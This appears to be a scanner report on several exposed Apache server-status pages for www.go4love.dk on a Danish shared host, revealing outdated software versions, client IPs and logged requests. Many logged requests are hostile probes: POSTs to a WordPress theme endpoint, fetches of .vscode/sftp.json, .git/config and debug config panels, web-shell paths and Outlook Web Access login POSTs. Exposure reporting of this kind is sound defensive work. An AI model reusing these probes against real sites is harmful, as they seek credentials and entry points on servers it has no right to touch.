81.19.232.105webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 23-2129360/33/214_ 0.04000.00.010.25 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-2129420/33/215_ 0.04000.00.010.12 164.90.228.79webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 25-2129450/32/214W 0.04000.00.010.08 164.90.228.79webhotel5.webhosting.dkGET /server-status HTTP/1.0 26-1-0/0/182. 0.07177350.00.000.08 144.126.158.34webhotel5.webhosting.dkGET / HTTP/1.0 27-1-0/0/182. 0.07177100.00.000.10 144.126.158.34webhotel5.webhosting.dkGET /xmlrpc.php?rsd HTTP/1.0 28-2103130/41/223_ 0.051540.00.010.11 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 29-2103140/37/196_ 0.061900.00.010.13 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-2103150/37/184_ 0.063510.00.010.06 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 31-1-0/0/100. 0.09237240.00.000.07 192.95.30.12www.valloe.orgGET /music/mnst051.htm HTTP/1.0 32-2103160/42/139_ 0.071400.00.010.11 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-2103170/39/136_ 0.08000.00.020.09 164.90.228.79webhotel5.webhosting.dkGET /about HTTP/1.0 34-2103180/38/135_ 0.053200.00.051.52 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-2103190/39/136_ 0.051400.00.010.06 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-2103200/39/118_ 0.0411480.00.010.06 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde36dbf7480
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 06-Jun-2024 04:46:54 CEST Restart Time: Thursday, 06-Jun-2024 04:00:07 CEST Parent Server Generation: 0 Server uptime: 46 minutes 46 seconds Total accesses: 2160 - Total Traffic: 1.3 MB CPU Usage: u.39 s.08 cu0 cs0 - .0167% CPU load .77 requests/sec - 488 B/second - 634 B/request 1 requests currently being processed, 33 idle workers _______________W__________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-024630/15/65_ 0.02000.00.000.02 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 1-024540/16/66_ 0.03000.00.000.03 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 2-024640/15/65_ 0.02000.00.000.06 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 3-024520/16/66_ 0.02050.00.010.03 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 4-024650/15/65_ 0.01000.00.000.03 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 5-024550/16/66_ 0.02130.00.010.03 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 6-024660/15/65_ 0.01000.00.000.03 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 7-024670/12/62_ 0.01720.00.000.02 148.251.121.91webhotel5.webhosting.dkHEAD / HTTP/1.0 8-024680/13/63_ 0.02000.00.000.02 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 9-024690/12/62_ 0.01600.00.000.02 148.251.121.91webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 10-024700/12/62_ 0.01510.00.000.07 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 11-024710/12/62_ 0.02620.00.000.03 148.251.121.91webhotel5.webhosting.dkGET / HTTP/1.0 12-024720/12/62_ 0.02430.00.000.02 131.153.240.162webhotel5.webhosting.dkGET / HTTP/1.0 13-024730/11/61_ 0.011560.00.010.03 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 14-024740/12/62_ 0.01400.00.000.02 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-024750/11/61W 0.01000.00.000.02 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 16-024760/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /web/wp-includes/wlwmanifest.xml HTTP/1.0 17-024770/11/61_ 0.001900.00.000.04 185.192.70.109webhotel5.webhosting.dkGET /2019/wp-includes/wlwmanifest.xml HTTP/1.0 18-024780/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /2018/wp-includes/wlwmanifest.xml HTTP/1.0 19-024790/11/61_ 0.001900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /shop/wp-includes/wlwmanifest.xml HTTP/1.0 20-024800/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /news/wp-includes/wlwmanifest.xml HTTP/1.0 21-024810/11/61_ 0.011900.00.000.19 185.192.70.109webhotel5.webhosting.dkGET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0 22-024820/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /media/wp-includes/wlwmanifest.xml HTTP/1.0 23-024830/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /test/wp-includes/wlwmanifest.xml HTTP/1.0 24-024840/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0 25-024850/11/61_ 0.001900.00.000.04 185.192.70.109webhotel5.webhosting.dkGET /site/wp-includes/wlwmanifest.xml HTTP/1.0 26-024860/11/61_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /sito/wp-includes/wlwmanifest.xml HTTP/1.0 27-024870/11/61_ 0.011900.00.190.21 185.192.70.109webhotel5.webhosting.dkGET /cms/wp-includes/wlwmanifest.xml HTTP/1.0 28-024880/11/61_ 0.011400.00.000.03 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-024890/11/61_ 0.001700.00.000.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-024900/11/61_ 0.03700.00.000.02 148.251.121.91webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 31-026170/10/60_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0 32-026180/10/60_ 0.011900.00.000.03 185.192.70.109webhotel5.webhosting.dkGET /website/wp-includes/wlwmanifest.xml HTTP/1.0 33-026190/10/60_ 0.011900.00.000.02 185.192.70.109webhotel5.webhosting.dkGET /wp/wp-includes/wlwmanifest.xml HTTP/1.0 34-0-0/0/50. 0.0670500.00.000.02 4.245.190.15webhotel5.webhosting.dkGET /ALFA_DATA/ HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde39446b971
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 04-Jun-2024 04:07:15 CEST Restart Time: Tuesday, 04-Jun-2024 04:00:05 CEST Parent Server Generation: 0 Server uptime: 7 minutes 9 seconds Total accesses: 515 - Total Traffic: 226 kB CPU Usage: u.36 s.08 cu0 cs0 - .103% CPU load 1.2 requests/sec - 539 B/second - 449 B/request 1 requests currently being processed, 34 idle workers _________________________W_________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0207630/17/17_ 0.01000.00.010.01 216.244.66.246webhotel5.webhosting.dkXI9ZGVzYyZhbXA7b3JkZXI9c2t1/form_key/bXkTkLOyxIIMH8Pt/ HTTP/1.0 1-0207640/15/15_ 0.01300.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 2-0207650/15/15_ 0.013300.00.010.01 216.244.66.246webhotel5.webhosting.dkmU9ZGEmYW1wO21vZGU9bGlzdA,,/form_key/NwxyLvP2SFcDCJVM/ HTTP/1.0 3-0207660/15/15_ 0.01720.00.010.01 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-0207670/16/16_ 0.01200.00.010.01 216.244.66.246webhotel5.webhosting.dk2phbS5odG1sP21vZGU9bGlzdA,,/form_key/Zyf3m3bQPDrnKcKU/ HTTP/1.0 5-0207680/14/14_ 0.01300.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 6-0207690/15/15_ 0.01500.00.010.01 216.244.66.246webhotel5.webhosting.dkj1kZXNjJmFtcDtvcmRlcj1za3U,/form_key/8taJX9OQl4smA8yn/ HTTP/1.0 7-0207710/15/15_ 0.0210380.00.010.01 139.59.173.90webhotel5.webhosting.dkGET / HTTP/1.0 8-0207720/15/15_ 0.011500.00.010.01 75.74.123.83webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-0207730/15/15_ 0.021000.00.010.01 216.244.66.246webhotel5.webhosting.dkWFybWVsYWRlLTMwMGcuaHRtbA,,/form_key/8Y1q1J0okYydKlNa/ HTTP/1.0 10-0207740/15/15_ 0.0210440.00.000.00 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 11-0207750/15/15_ 0.01920.00.010.01 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 12-0207760/15/15_ 0.02200.00.010.01 216.244.66.246webhotel5.webhosting.dkmFtcDtfX19mcm9tX3N0b3JlPWRh/form_key/jfra8r8hdzqHHN6e/ HTTP/1.0 13-0207770/15/15_ 0.01800.00.010.01 216.244.66.246webhotel5.webhosting.dkmFtcDtvcmRlcj1wb3NpdGlvbg,,/form_key/Hzl9zkCZBNjogg0f/ HTTP/1.0 14-0207780/15/15_ 0.01700.00.010.01 216.244.66.246webhotel5.webhosting.dkmFtcDtvcmRlcj1wb3NpdGlvbg,,/form_key/lBA217rphdxZYDXn/ HTTP/1.0 15-0207790/15/15_ 0.01600.00.030.03 216.244.66.246webhotel5.webhosting.dkCZhbXA7b3JkZXI9cG9zaXRpb24,/form_key/lRw6YzTVkPm0KgPb/ HTTP/1.0 16-0207800/15/15_ 0.01400.00.010.01 216.244.66.246webhotel5.webhosting.dkW1wO19fX2Zyb21fc3RvcmU9ZGE,/form_key/QLmmRfvgSBTaJw9q/ HTTP/1.0 17-0207810/15/15_ 0.02450.00.010.01 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 18-0207820/15/15_ 0.02300.00.010.01 216.244.66.246webhotel5.webhosting.dkmFtcDtfX19mcm9tX3N0b3JlPWRh/form_key/9rEqmaj7cEWfxXEo/ HTTP/1.0 19-0207830/15/15_ 0.01200.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 20-0208070/15/15_ 0.01100.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 21-0208520/15/15_ 0.00100.00.010.01 216.244.66.246webhotel5.webhosting.dkmFtcDtvcmRlcj1wb3NpdGlvbg,,/form_key/FkeLpVHcEcHv1805/ HTTP/1.0 22-0208530/15/15_ 0.01100.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 23-0208800/15/15_ 0.02000.00.000.00 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 24-0208810/14/14_ 0.013300.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /app-ads.txt HTTP/1.0 25-0208820/14/14W 0.02000.00.010.01 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 26-0208830/14/14_ 0.013400.00.010.01 216.244.66.246webhotel5.webhosting.dk3QmYW1wO29yZGVyPXBvc2l0aW9u/form_key/ovT2koJudEtZSXMn/ HTTP/1.0 27-0209090/14/14_ 0.013200.00.010.01 216.244.66.246webhotel5.webhosting.dk19mcm9tX3N0b3JlPWRlZmF1bHQ,/form_key/VsVa7x2EZCiuJvtx/ HTTP/1.0 28-0209100/14/14_ 0.013100.00.000.00 216.244.66.246webhotel5.webhosting.dkXA7X19fZnJvbV9zdG9yZT1kYQ,,/form_key/zuO1x28s2tbTWIVJ/ HTTP/1.0 29-0209110/13/13_ 0.013000.00.000.00 127.0.0.1webhotel5.webhosting.dkGET / HTTP/1.0 30-0209120/14/14_ 0.022610.00.000.00 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 31-0209130/14/14_ 0.012520.00.010.01 18.118.207.86webhotel5.webhosting.dkGET / HTTP/1.0 32-0209140/14/14_ 0.012220.00.010.01 18.118.207.86webhotel5.webhosting.dkGET / HTTP/1.0 33-0209150/14/14_ 0.021800.00.010.01 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-0209160/14/14_ 0.011700.00.010.01 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3a5bf58ab
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 03-Jun-2024 01:11:33 CEST Restart Time: Sunday, 02-Jun-2024 04:00:06 CEST Parent Server Generation: 21 Server uptime: 21 hours 11 minutes 27 seconds Total accesses: 77832 - Total Traffic: 80.5 MB CPU Usage: u.81 s.32 cu0 cs0 - .00148% CPU load 1.02 requests/sec - 1106 B/second - 1084 B/request 1 requests currently being processed, 32 idle workers ___________W_____________________............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2154550/10/2356_ 0.015400.00.001.77 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-2154470/11/2363_ 0.01000.00.004.51 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 2-2154450/11/2335_ 0.01000.00.002.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-2154560/10/2351_ 0.015400.00.042.22 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/block-patterns/index.php HTTP/1.0 4-2154460/11/2350_ 0.01000.00.001.95 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 5-2154480/11/2350_ 0.01000.00.001.99 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 6-2154530/10/2345_ 0.005500.00.003.34 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-2154490/11/2346_ 0.01000.00.002.13 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 8-2154600/10/2310_ 0.004500.00.003.54 77.60.86.182webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-2154500/11/2330_ 0.01000.00.002.10 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 10-2154510/11/2340_ 0.01000.00.004.16 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-2154520/10/2339W 0.01000.00.002.15 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-2154570/10/2316_ 0.015100.00.001.55 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/block-supports/index.php HTTP/1.0 13-2154540/10/2332_ 0.005700.00.001.91 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/assets/index.php HTTP/1.0 14-2154580/10/2310_ 0.004800.00.002.81 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/blocks/index.php HTTP/1.0 15-2154610/10/2272_ 0.0144490.00.001.83 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 16-2154590/10/2321_ 0.014600.00.004.04 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/css/index.php HTTP/1.0 17-2155490/10/2303_ 0.013400.00.001.54 185.211.58.110webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-2156030/10/2220_ 0.023300.00.002.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-2156660/10/2141_ 0.033300.00.001.58 121.123.104.2webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 20-2157200/10/2117_ 0.0126230.00.001.52 35.185.43.199www.mercasol-frv.dkGET /robots.txt HTTP/1.0 21-2158950/10/2038_ 0.012660.00.011.93 35.185.43.199www.mercasol-frv.dkGET / HTTP/1.0 22-2159080/10/2035_ 0.012050.00.001.46 176.111.174.153webhotel5.webhosting.dkGET / HTTP/1.0 23-2159990/10/1917_ 0.01120.00.001.14 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 24-2160910/9/1988_ 0.01100.00.003.56 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-2161000/10/1975_ 0.01000.00.002.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-2161490/10/1917_ 0.02050.00.001.58 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 27-2171340/8/1870_ 0.015500.00.001.72 45.227.161.95webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 28-2171360/8/1864_ 0.015500.00.002.15 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-2171370/8/1837_ 0.005500.00.001.68 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-2154420/11/1814_ 0.014300.00.003.02 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/customize/index.php HTTP/1.0 31-2154430/11/1655_ 0.012800.00.021.31 85.208.98.31webhotel5.webhosting.dkds&querydesc=SimpleSearchQuery_SimilarAds&viewedfrom=6 HTTP/1.0 32-2154440/11/1459_ 0.011100.00.001.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-20-0/0/1258. 0.06303200.00.000.82 13.79.130.252webhotel5.webhosting.dk /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.0 34-19-0/0/1040. 0.02428700.00.003.75 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-19-0/0/822. 0.05694200.00.000.60 138.199.29.43webhotel5.webhosting.dkGET /wp-content/languages/about.php HTTP/1.0 36-19-0/0/822. 0.06694400.00.000.51 138.199.29.43webhotel5.webhosting.dkGET /.well-known/pki-validation/db-update.php HTTP/1.0 37-19-0/0/634. 0.06567100.00.000.43 81.19.232.105webhotel5.webhosting.dkfrontpage/products/whoop-ass-west-coast-west-coast-ipa HTTP/1.0 38-19-0/0/471. 0.06567100.00.000.16 91.92.242.199webhotel5.webhosting.dkGET /wp-includes/ID3/index.php HTTP/1.0 39-19-0/0/351. 0.07567200.00.000.17 216.244.66.246webhotel5.webhosting.dkhlist/index/add/product/148/form_key/fucNICVPaRsbC77C/ HTTP/1.0 40-19-0/0/351. 0.06567100.00.000.10 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-12-0/0/301. 0.053050100.00.000.12 51.138.184.184webhotel5.webhosting.dkPOST /blazeds/messagebroker/http HTTP/1.0 42-12-0/0/251. 0.053050100.00.000.16 51.138.184.184webhotel5.webhosting.dkPOST /lcds/messagebroker/http HTTP/1.0 43-12-0/0/251. 0.063050010.00.000.11 51.138.184.184webhotel5.webhosting.dkGET / HTTP/1.0 44-12-0/0/161. 0.053050110.00.000.05 51.138.184.184webhotel5.webhosting.dkGET / HTTP/1.0 45-12-0/0/162. 0.063050010.00.000.07 51.138.184.184webhotel5.webhosting.dkGET / HTTP/1.0 46-12-0/0/91. 0.053050000.00.000.03 51.138.184.184webhotel5.webhosting.dkGET /internalServerReporting.php HTTP/1.0 47-12-0/0/50. 0.053050000.00.000.02 51.138.184.184webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde300d5412e
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 01-Jun-2024 23:30:25 CEST Restart Time: Saturday, 01-Jun-2024 16:05:04 CEST Parent Server Generation: 7 Server uptime: 7 hours 25 minutes 21 seconds Total accesses: 23424 - Total Traffic: 61.8 MB CPU Usage: u1.69 s.73 cu0 cs0 - .00906% CPU load .877 requests/sec - 2423 B/second - 2765 B/request 1 requests currently being processed, 38 idle workers _____________________________W_________......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-7308620/41/711_ 0.072000.00.891.79 185.231.113.38webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-7308630/42/714_ 0.062800.00.921.77 47.128.30.247webhotel5.webhosting.dkublicationName=online&issueName=Issue_published&page=5 HTTP/1.0 2-7308640/43/708_ 0.07000.00.951.74 81.19.232.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 3-7308650/42/708_ 0.084900.01.512.54 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 4-7308660/41/709_ 0.076200.00.261.31 198.235.24.23www.brandstation.infoGET / HTTP/1.0 5-7308670/42/706_ 0.0743500.00.141.07 178.254.38.45webhotel5.webhosting.dkGET / HTTP/1.0 6-7308680/42/703_ 0.0747130.00.821.83 81.19.232.105www.reuterfoto.dkGET /var/.git/config HTTP/1.0 7-7308690/43/701_ 0.06000.00.271.20 81.19.232.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 8-7308700/42/700_ 0.065020.00.161.37 81.19.232.105www.lillekrabbe.dkGET / HTTP/1.0 9-7308710/42/699_ 0.083000.00.911.76 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-7308720/42/698_ 0.052800.00.831.73 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-7308730/45/700_ 0.07500.00.731.74 47.128.51.183webhotel5.webhosting.dkuerydesc=SimpleSearchQuery_SameCompanyAds&viewedfrom=5 HTTP/1.0 12-7308740/42/696_ 0.071100.00.872.14 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-7308750/40/696_ 0.062530.01.172.27 83.97.73.239webhotel5.webhosting.dkGET / HTTP/1.0 14-7308760/42/656_ 0.06000.00.661.65 81.19.232.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 15-7308770/41/692_ 0.06750.00.571.57 205.210.31.252webhotel5.webhosting.dkGET / HTTP/1.0 16-7308780/41/692_ 0.061900.00.391.74 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-7308790/42/692_ 0.071900.00.992.05 174.83.228.83webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-7308800/41/689_ 0.07000.00.613.51 81.19.232.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 19-7308810/41/690_ 0.07030.01.322.45 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 20-7308850/41/688_ 0.07170.00.842.93 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 21-7308860/42/684_ 0.06000.00.931.90 81.19.232.105webhotel5.webhosting.dkGET /about HTTP/1.0 22-7308880/41/628_ 0.076220.00.571.50 198.235.24.23webhotel5.webhosting.dkGET / HTTP/1.0 23-7308970/41/626_ 0.066230.00.341.49 205.210.31.232webhotel5.webhosting.dkGET / HTTP/1.0 24-7308980/40/618_ 0.085040.00.571.30 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 25-7309070/42/600_ 0.061400.01.182.14 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-7309170/41/610_ 0.075500.00.301.07 146.70.96.73webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 27-7309280/42/598_ 0.072900.00.801.92 81.19.232.105webhotel5.webhosting.dkuerydesc=SimpleSearchQuery_SameCompanyAds&viewedfrom=5 HTTP/1.0 28-7309460/41/595_ 0.065800.00.371.43 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-7313300/38/597W 0.06000.00.531.84 81.19.232.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 30-7356480/13/532_ 0.015400.00.261.28 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-7356490/13/456_ 0.024600.00.251.12 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-7356500/13/408_ 0.024400.00.051.23 108.162.226.248webhotel5.webhosting.dkGET /oenskeliste/view/ HTTP/1.0 33-7356510/13/448_ 0.024100.00.281.30 66.249.79.131webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 34-7308610/48/355_ 0.06000.00.770.92 81.19.232.105webhotel5.webhosting.dkGET /server HTTP/1.0 35-7356520/13/272_ 0.025300.00.050.21 47.128.117.217webhotel5.webhosting.dkuerydesc=SimpleSearchQuery_SameCompanyAds&viewedfrom=5 HTTP/1.0 36-7356530/13/318_ 0.026000.00.050.31 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 37-7356540/12/115_ 0.014420.00.220.32 127.0.0.1webhotel5.webhosting.dkGET / HTTP/1.0 38-7356550/13/116_ 0.013920.00.210.26 72.14.199.65webhotel5.webhosting.dkGET / HTTP/1.0 39-0-0/0/50. 0.062501200.00.000.01 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 40-0-0/0/50. 0.062501300.00.000.01 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 41-0-0/0/50. 0.062501100.00.000.01 81.19.232.105www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 42-0-0/0/50. 0.062501000.00.000.02 